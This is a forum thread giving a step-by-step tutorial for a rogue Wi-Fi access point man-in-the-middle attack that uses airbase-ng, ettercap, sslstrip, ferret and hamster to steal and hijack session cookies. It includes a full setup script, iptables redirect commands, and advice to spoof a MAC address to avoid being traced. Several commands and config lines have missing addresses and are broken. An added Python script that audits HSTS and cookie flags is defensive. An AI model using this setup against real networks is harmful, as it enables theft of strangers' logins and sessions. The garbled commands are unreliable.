
Thread: How to Sidejack Secure Sessions using a Rogue AP, ssl strip, ferret and hamster

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010

    How to Sidejack Secure Sessions using a Rogue AP, ssl strip, ferret and hamster

    First off, this is a tutorial based on fifo_thekid's information. So hats off to you, sir.

    OK. What we're going to be doing is setting up a rogue access point and side-jacking session cookies using ferret and hamster. Here's what you will need:
    dhcp3-server (with custom dhcpd.conf file)
    2 Network Interfaces (1 wired + 1 Wireless or 2 Wireless. One of the wireless interfaces needs to be capable of monitoring.)

    All of these are built in to BT4PF, with the exception of and (obviously) the custom dhcp conf file and network interfaces. Go to your /pentest/wireless directory and create a new file called and fill it in as follows:

    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    echo -n "Enter your wireless interface MAC(XX:XX:XX:XX:XX:XX) [Optional,]: "
    read -e MAC
    echo -n "Enter the channel you would like your rogue AP to be called [Optional]: "
    read -e CHAN
    killall -9 dhcpcd dhcpd3 airbase-ng ettercap
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun &
    cmd="konsole -e airbase-ng -e ""$ESSID"" -P -C 30 -v "
    if [ -n "$CHAN" ]; then
    cmd=$cmd"-c "$CHAN" "
    fi
    if [ -n "$MAC" ]; then
    cmd=$cmd"-a "$MAC" "
    fi
    $cmd &
    echo "Waiting 10 seconds for the SoftAP to be established"
    sleep 10
    echo "SoftAP should be working now"
    ifconfig at0 up
    ifconfig at0 netmask
    ifconfig at0 mtu 1400
    route add -net netmask gw
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    rm /var/run/
    touch /var/run/
    chgrp dhcpd /var/run/
    chown dhcpd /var/run/
    konsole -e dhcpd3 -d -f -cf /etc/dhcpd.conf at0 &
    konsole -e ettercap -T -p -q -i at0 // // &
    echo "Waiting 8 seconds for portforwarding and DHCP server"
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward
    echo "Portforwarding and DHCP should be working now"
    Credit for this goes to fifo_thekid, because its his script!

    Once you have done that, open a Konsole and type:
    chmod +x /pentest/wireless/
    so we can use it accordingly.

    Let's get started.

    First off, we need to make some changes to the DHCP files. I'll be showing my examples with vim. If you want to use a different editor, more power to you. So the first thing:

    vim /etc/default/dhcp3-server

    Down at the very bottom, you will see something that says:
    Even if there is something filled in between the quotes, that's OK, because we're going to be changing it anyway. Change it to:
    This will come into play later.

    Now, we need to change our dhcpd.conf file to hand out IPs the way we want it to. So open a console and go to /etc/dhcp3. We of course want to back up our current dhcpd.conf file to something like dhcpd.conf.old. Now create a dhcpd.conf file that looks like this:

    option domain-name-servers;
    default-lease-time 60;
    max-lease-time 72;
    ddns-update-style none;
    log-facility local7;
    subnet netmask {
     option routers;
     option domain-name-servers
    This will allow our Rogue AP to hand out IPs using

    Now open a Konsole and type:
    You will be prompted for some information:

    1. Internet interface. Whatever interface connects to the internet, input that.
    2. Wireless interface. Whichever wireless interface is capable of monitoring, input that.
    3. ESSID. Input the name of the Rogue ESSID you want the fake AP to put out.
    4. Wireless Interface MAC (butt covering). Input a fake MAC here if desired. If you don't, it will use the MAC of the wireless adapter, which would make it very easy to trace back to you. This is optional.
    5. Channel Output. Whatever channel you want the fake AP to put out. Also optional.

    Some other windows will pop up after a number of seconds. LEAVE THEM ALL RUNNING! These are starting the rogue AP.

    Once they finish, open a new shell and type:
    sslstrip -p
    This is going to start ssl strip so that we can view secure sessions as necessary.

    Open another shell and type:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    This is going to route all HTTP web traffic through port 10000. Because we're using sslstrip, ALL traffic, even HTTPS, will go through this port.

    In the same shell, type:
    service dhcp3-server start
    Although the script tries to start DHCP, it doesn't work because it has to create the interface first, so we have to start it manually.

    Still in the same shell, type:
    /pentest/exploits/ferret/bin/ferret -i at0
    This starts monitoring on the Rogue DHCP service. Leave this running.

    In a new shell, type:
    This is going to start the hamster sidejacking tool to keep an eye on session cookies.

    Now, open up Konqueror. We need to route it through our local hamster proxy to view traffic, so go to Settings > Configure Konqueror and choose Proxy on the left. Pick Manually Specify and route it through on port 1234.

    What you have accomplished now is creating a Rogue AP that people will see when they scan for wireless networks. It shows up as an open network. Once they connect to said network, you capture all traffic using your BackTrack machine before traffic reaches your internet connection. In other words, this is a very sneaky man-in-the-middle attack.

    Now, go to http://hamster in Konqueror and watch for traffic and available sessions. When cookies are captured, the host will show up on the right. Click on the host link to view sessions.

    Happy Sidejacking!
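Added example, not part of the original post or of fifo_thekid's script: the chain above only works when a site lets the session ride over plain HTTP, so the two things a site owner should check are HSTS (which stops a returning browser from ever sending the plaintext request that sslstrip rewrites) and the Secure/HttpOnly flags on session cookies (which keep the cookie off the HTTP connection that ferret/hamster read). The script below audits a raw HTTP response for exactly those headers. The two sample responses are constructed, and the one-year minimum max-age is an assumption chosen for this example, not a value from the thread.

```python
"""Audit an HTTP response for the headers that defeat an sslstrip + cookie
sidejacking chain: Strict-Transport-Security and the Secure/HttpOnly flags
on Set-Cookie. Added example; the sample responses below are constructed."""
import re

# Constructed sample responses (not captured from any real server).
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: PHPSESSID=0123456789abcdef; Path=/\r\n"
    "\r\n"
    "<html>...</html>"
)

HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Set-Cookie: PHPSESSID=0123456789abcdef; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "\r\n"
    "<html>...</html>"
)

MIN_HSTS_AGE = 31536000  # one year; threshold chosen for this example (assumption)


def parse_headers(raw):
    """Return (status_line, [(name_lower, value), ...]) from a raw HTTP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def parse_cookie(value):
    """Split a Set-Cookie value into the cookie name and its attribute names."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    return name, attrs


def audit(raw):
    """Return HSTS max-age, per-cookie flags and a list of human-readable issues."""
    _, headers = parse_headers(raw)
    issues = []

    # HSTS: without it, the first plain-HTTP request can be downgraded by sslstrip.
    hsts = [v for n, v in headers if n == "strict-transport-security"]
    max_age = None
    if not hsts:
        issues.append("no Strict-Transport-Security header: an HTTP visit can be downgraded by sslstrip")
    else:
        m = re.search(r"max-age=(\d+)", hsts[0], re.I)
        max_age = int(m.group(1)) if m else 0
        if max_age < MIN_HSTS_AGE:
            issues.append(f"HSTS max-age {max_age} is shorter than {MIN_HSTS_AGE}")
        if "includesubdomains" not in hsts[0].lower():
            issues.append("HSTS lacks includeSubDomains")

    # Cookies: a session cookie without Secure is sent over HTTP and can be sidejacked.
    cookies = []
    for n, v in headers:
        if n != "set-cookie":
            continue
        name, attrs = parse_cookie(v)
        secure = "secure" in attrs
        httponly = "httponly" in attrs
        cookies.append({"name": name, "secure": secure, "httponly": httponly})
        if not secure:
            issues.append(f"cookie {name} lacks Secure: it travels over plaintext HTTP and can be sidejacked")
        if not httponly:
            issues.append(f"cookie {name} lacks HttpOnly")

    return {"hsts_max_age": max_age, "cookies": cookies, "issues": issues}


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        result = audit(raw)
        print(f"{label}: {len(result['issues'])} issue(s)")
        for issue in result["issues"]:
            print("  -", issue)
```

Run it as-is to see the weak response flagged three times and the hardened one pass clean; to audit a real site, feed `audit()` the raw response text of its login page. HSTS only protects browsers that have already seen the header once, so the Secure flag on the session cookie is the check that matters most against this particular setup.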

  2. #2
    Just burned his ISO
    Join Date
    Nov 2009


    I nearly got it working.
    When I connect with a host to the Rogue AP I keep getting the error: recv failed: connection reset by peer.

    There also seems to be an error in your dhcp code:

    subnet netmask {
     option routers;
     option domain-name-servers
    This kept giving me errors, so I added a semicolon and removed the last IP address:

    subnet netmask {
     option routers;
     option domain-name-servers;

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010


    Strange. The exact configuration the way it is written originally worked fine for me, without the semicolon and both DNS servers.

    I will say, though, that getting the dhcpd.conf file right was the most annoying part of setting the whole thing up, so it may change on an adapter to adapter basis. I'll have to look into that. Thanks for the tip, though.
